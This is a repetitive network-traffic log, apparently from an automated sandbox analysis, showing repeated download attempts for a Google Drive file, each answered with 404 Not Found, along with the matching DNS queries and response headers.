      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTTdXpZSXlwSiAzrjMhkKapMak9eF3AaveGf_RYft8RZNr2coBwVTLIJw74yCojNBRLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-DeDfnxsw2JoCIImyO2KlWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ; expires=Sun, 13-Jul-2025 04:06:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ7Oj6XiMKPrNThbbNvGLq5Ji9066ekkRbzA-wvmisqifUl2t9TUFrdvfYOw4MHfun1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:04 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nBZbLe45NRVS_eqPGpPZ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSz4JJ8K40AwlCuQSzhm6caGWtikNTIeyWkUYW7zGpeC5SgjT1D6Cx_r_j1CAEmdpAnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:07 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QIqOKJo2_cz0vSGF6AadGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQrxNivytgpzIfroY0Km0Oa-BzAOcmlbaiJ6dQpGvoHB-7qR2ZBjmn_jV5K9UWPgTJnpKoelQMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-S6Tnd-aNAsf65K3p4SIduw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQevJy5pKGLnkINqKLQFJTEPMiQDZdVwHbAHIDueYLep5wA6a4z1sJPHn2X-0Z8kSTzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:11 GMTContent-Security-Policy: script-src 'nonce-gQ62IfalAGZa63GOZV9y4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRLB1Bf6Wbp5FM0bH_v8mp-g6dua5NPQE_sGXKc_8m4rUKAOsBii_IU2X07oAyqs4wvYVFLwH0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:13 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--E3SRwmpsQuIeF1zFLz4Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7JEAIPbmccGRSwlVWxNwGKC6XqexVsmKDyq-rgsnb_abHBlULabqVh6k3AmwR_RTrSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:16 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-bUluizeK6fEkl6dlI3XOyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTQHPwfdBnfp-ztXYWzOxnM-hVeXmULAkfoaZfLc1V0Q-ePf4sh-8C4f5fe4qtqryI7tZl_S_8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-Mu3T3IN1Ve0YN77zcErTHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRPc2edr0MeDBTSTsYrturhPAcPn9kUJhIQjYTunpBjZ-66fhx8cClLbHVS7oV4oA_XeQyqBuYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5UbIlpXEUUaJdiC3T6yoyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTe8q5Xf09XMaNgsioVGNXw6ve2IKa3hpDmCVd6qYG9X3zlvKTbU4PKMfkK1C3mH87uContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-yVMzFqr-45LlEoaaWKUESw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UDBcF1tDJrVDDsMZggfVo91g2qIDiD5VLUqYOhse8fUefxqhSlzT4mn0K5YkM_GDoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-4JfukRkcZnKtvJf2QnTFbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
